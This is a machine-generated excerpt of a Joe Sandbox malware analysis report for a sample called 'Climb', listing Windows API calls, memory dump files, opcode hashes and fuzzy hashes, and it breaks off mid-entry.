                                                                                                                                                                          • Instruction Fuzzy Hash: 14112832A01119ABCF00DFE8C9469FE7BB9EB05380F100452F912E3140CB31AA92DBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00ACEB14
                                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00ACEB47
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00ACEB5D
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00ACEB64
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2880819207-0
                                                                                                                                                                          • Opcode ID: 29a2781c11dd8e4e451e22d4846f55062a6d23a3b0c6a3e232cf1ed3eee01466
                                                                                                                                                                          • Instruction ID: 1a2c52b9ed2156bdcecf6673c4a4df56038f898d1e1ab304a9010558e7137489
                                                                                                                                                                          • Opcode Fuzzy Hash: 29a2781c11dd8e4e451e22d4846f55062a6d23a3b0c6a3e232cf1ed3eee01466
                                                                                                                                                                          • Instruction Fuzzy Hash: E811D676900218BFC701EBE89C06FAE7FADEB45320F15825AF915E3290DB748D0587A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,00A8D369,00000000,00000004,00000000), ref: 00A8D588
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A8D594
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00A8D59B
                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 00A8D5B9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 173952441-0
                                                                                                                                                                          • Opcode ID: 06671db2dc35103be79b9caf39f4f948a571c4a7c7e878a0f1965d59d0317ca9
                                                                                                                                                                          • Instruction ID: 5f37d3704dbe744066c21bf554695962755218b47b9abe3d40fd9528f3e82b04
                                                                                                                                                                          • Opcode Fuzzy Hash: 06671db2dc35103be79b9caf39f4f948a571c4a7c7e878a0f1965d59d0317ca9
                                                                                                                                                                          • Instruction Fuzzy Hash: 6201F132400214BBDB25BFE5EC09FAE7B69EF81334F10032AF9258A1E0DB708901D7A1
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A678B1
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00A678C5
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A678CF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                                          • Opcode ID: 73d1216128b40e634bd0fcb9d1d6e9f38394e624ab7b0eb8a33ad3d7f131c52a
                                                                                                                                                                          • Instruction ID: e1e1b46bb886ddf6d4da058c1d9b670d286a8ea8912148f131e476816672907c
                                                                                                                                                                          • Opcode Fuzzy Hash: 73d1216128b40e634bd0fcb9d1d6e9f38394e624ab7b0eb8a33ad3d7f131c52a
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F118B72505108BFDF129FD08C58EEEBB79FF09368F040115FA0056120D7319CA0EBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00A9338D,00000364,00000000,00000000,00000000,?,00A935FE,00000006,FlsSetValue), ref: 00A93418
                                                                                                                                                                          • GetLastError.KERNEL32(?,00A9338D,00000364,00000000,00000000,00000000,?,00A935FE,00000006,FlsSetValue,00B03260,FlsSetValue,00000000,00000364,?,00A931B9), ref: 00A93424
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A9338D,00000364,00000000,00000000,00000000,?,00A935FE,00000006,FlsSetValue,00B03260,FlsSetValue,00000000), ref: 00A93432
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                          • Opcode ID: ec77e3636d6dfe8ffcc8b66e885a8d2bf8a3469bc06c84c0fcb30db7ef59948d
                                                                                                                                                                          • Instruction ID: 206f90ad79ccf44a4f0506b8df945d5ff20bd5e3a083f83afb98b39d7156a4e0
                                                                                                                                                                          • Opcode Fuzzy Hash: ec77e3636d6dfe8ffcc8b66e885a8d2bf8a3469bc06c84c0fcb30db7ef59948d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4501AC37751222ABCF238BB99C449667BF9BF85BA27220620F906D7140DB20DD02C6E0
                                                                                                                                                                          APIs
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00ACB69A,?,00008000), ref: 00ACBA8B
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00ACB69A,?,00008000), ref: 00ACBAB0
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00ACB69A,?,00008000), ref: 00ACBABA
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00ACB69A,?,00008000), ref: 00ACBAED
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                                          • Opcode ID: 018799827acd64309c2446e9f4fe13325fb6c078a8eb27de1d331bd4e56f83a8
                                                                                                                                                                          • Instruction ID: ffa04d5088b99b9d87f354b7edcd855168fca58d9581e759f9b3eac55fc9fcc6
                                                                                                                                                                          • Opcode Fuzzy Hash: 018799827acd64309c2446e9f4fe13325fb6c078a8eb27de1d331bd4e56f83a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 43118B30C10629EBCF00DFE9E94ABEEBB78BF09751F124199D981B2140CB318A51CBA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00AF888E
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00AF88A6
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00AF88CA
                                                                                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AF88E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 357397906-0
                                                                                                                                                                          • Opcode ID: fc63f3285fa20092b5b6c1d0273d28104fe871faf80126d735999a2068d559ec
                                                                                                                                                                          • Instruction ID: eae6967e447bd5151cf1f68c6b6ad26b13c915f4b26eeddb55bef1fbd81de51a
                                                                                                                                                                          • Opcode Fuzzy Hash: fc63f3285fa20092b5b6c1d0273d28104fe871faf80126d735999a2068d559ec
                                                                                                                                                                          • Instruction Fuzzy Hash: 201140B9D00209AFDB41CFE8C884AEEBBB5FB08350F508166E915E3210D735AA55CF90
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AC3712
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC3723
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00AC372A
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AC3731
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2710830443-0
                                                                                                                                                                          • Opcode ID: 526fd123344122f85311eccb61a23ee4a4121e48ff3103326a936d6942f97af5
                                                                                                                                                                          • Instruction ID: 8d0c65b6e1fd50c23baeab3c027fece26497345d619a795b3e153d24a387f868
                                                                                                                                                                          • Opcode Fuzzy Hash: 526fd123344122f85311eccb61a23ee4a4121e48ff3103326a936d6942f97af5
                                                                                                                                                                          • Instruction Fuzzy Hash: 70E092B2101224BBDB2197E29C4DFFBBF6DDF42BA1F014019F105E6080DAA5C941D2B0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A61F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A61F87
                                                                                                                                                                            • Part of subcall function 00A61F2D: SelectObject.GDI32(?,00000000), ref: 00A61F96
                                                                                                                                                                            • Part of subcall function 00A61F2D: BeginPath.GDI32(?), ref: 00A61FAD
                                                                                                                                                                            • Part of subcall function 00A61F2D: SelectObject.GDI32(?,00000000), ref: 00A61FD6
                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00AF92E3
                                                                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00AF92F0
                                                                                                                                                                          • EndPath.GDI32(?), ref: 00AF9300
                                                                                                                                                                          • StrokePath.GDI32(?), ref: 00AF930E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                                          • Opcode ID: 0d7cf4d96b1cf260eaf7b9652853f1e3ad2f87aa6d550f61a72cb1be22a99d21
                                                                                                                                                                          • Instruction ID: 10220e2a1ed0f092eb8f70f104ccd56ab9703f7d4a1ee0acb499675a3c91e851
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d7cf4d96b1cf260eaf7b9652853f1e3ad2f87aa6d550f61a72cb1be22a99d21
                                                                                                                                                                          • Instruction Fuzzy Hash: D8F05E31005259BADB139FD4AC0EFDE3F6AAF0A324F148201FA12250E1CB755562DBA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSysColor.USER32(00000008), ref: 00A621BC
                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 00A621C6
                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00A621D9
                                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 00A621E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$ModeObjectStockText
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4037423528-0
                                                                                                                                                                          • Opcode ID: a2c04028e331cf0610c909f78d7b69234410371ba9acdc9a6dda29bf2e0cedea
                                                                                                                                                                          • Instruction ID: 98e226dc630f8b2097fa2eaf44b3975b18df2ec3a9ae26600a9786aaebc0a117
                                                                                                                                                                          • Opcode Fuzzy Hash: a2c04028e331cf0610c909f78d7b69234410371ba9acdc9a6dda29bf2e0cedea
                                                                                                                                                                          • Instruction Fuzzy Hash: 67E06532240640AEDB229BF4AC097F97B62AB12336F14831AF7B6580E0C7724641DB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00ABEC36
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00ABEC40
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ABEC60
                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 00ABEC81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                          • Opcode ID: 6100c079f038cf534c7c8958ade2b591ef7a411aea7eec671057637fe0a4ff7e
                                                                                                                                                                          • Instruction ID: 3b84514d4fc1d696852239aa936b88531eb47c2a1845e1ff20e9038f12f3ba6f
                                                                                                                                                                          • Opcode Fuzzy Hash: 6100c079f038cf534c7c8958ade2b591ef7a411aea7eec671057637fe0a4ff7e
                                                                                                                                                                          • Instruction Fuzzy Hash: AEE012B4800204EFCB92EFE0C908AADBFB6EB08311F108449E80AE7251DB385902EF00
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00ABEC4A
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00ABEC54
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ABEC60
                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 00ABEC81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                          • Opcode ID: f57fb93e5871acf2f52851df4a9247134f75b112dc83a8811df50a9fb46f019d
                                                                                                                                                                          • Instruction ID: 96bf4263ec77508286d362d4db275a1c7cb6e5eba617f8965e8c8bc720076caa
                                                                                                                                                                          • Opcode Fuzzy Hash: f57fb93e5871acf2f52851df4a9247134f75b112dc83a8811df50a9fb46f019d
                                                                                                                                                                          • Instruction Fuzzy Hash: 48E012B4C00204EFCB92DFE0C908A6DBBB2EB08310B108449E80AE7250DB386902EF00
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A641EA: _wcslen.LIBCMT ref: 00A641EF
                                                                                                                                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00AD5919
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Connection_wcslen
                                                                                                                                                                          • String ID: *$LPT
                                                                                                                                                                          • API String ID: 1725874428-3443410124
                                                                                                                                                                          • Opcode ID: dbbac69e6c2d829e2c4e1e7ebd4b65837d640c80ef93ce6d0f6bfd9bcb3b37c0
                                                                                                                                                                          • Instruction ID: da539987e071c81185b1157f9563ed8e2b919cc52bac3418f58ad7ab4d4c83d9
                                                                                                                                                                          • Opcode Fuzzy Hash: dbbac69e6c2d829e2c4e1e7ebd4b65837d640c80ef93ce6d0f6bfd9bcb3b37c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 85917B75E00614DFDB14DF64C494EAABBF1AF44314F18809AE84A9F362C731EE85CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00A8E67D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                          • String ID: pow
                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                          • Opcode ID: 9088fc4322629f5eef5c88fb2f0d7cfd37b57ec567fa270f1e37272d5ef5d36d
                                                                                                                                                                          • Instruction ID: b715ca764e6be73b2ac741c8cfeccb0f8e697bec1adf2e0338acc219f9d5f635
                                                                                                                                                                          • Opcode Fuzzy Hash: 9088fc4322629f5eef5c88fb2f0d7cfd37b57ec567fa270f1e37272d5ef5d36d
                                                                                                                                                                          • Instruction Fuzzy Hash: AE515C71F09102D6CF15FB14DE0136A2BE4EB61B50F304E68F091822E9FF398D969B46
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: #
                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                          • Opcode ID: ee78cafb2f56771bcdb6fbdffa498bbcc52ae44a3a35d657c68374c4567fea2e
                                                                                                                                                                          • Instruction ID: 3b4c9a67eae507a1d663c33edd27a2eb4529f039d380e575ec4f64cb65fa3880
                                                                                                                                                                          • Opcode Fuzzy Hash: ee78cafb2f56771bcdb6fbdffa498bbcc52ae44a3a35d657c68374c4567fea2e
                                                                                                                                                                          • Instruction Fuzzy Hash: 52515135504246EFCB25DF28C840AFE7BB8EF65310F64C055E9919B282DB389C92CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 00A7F6DB
                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A7F6F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
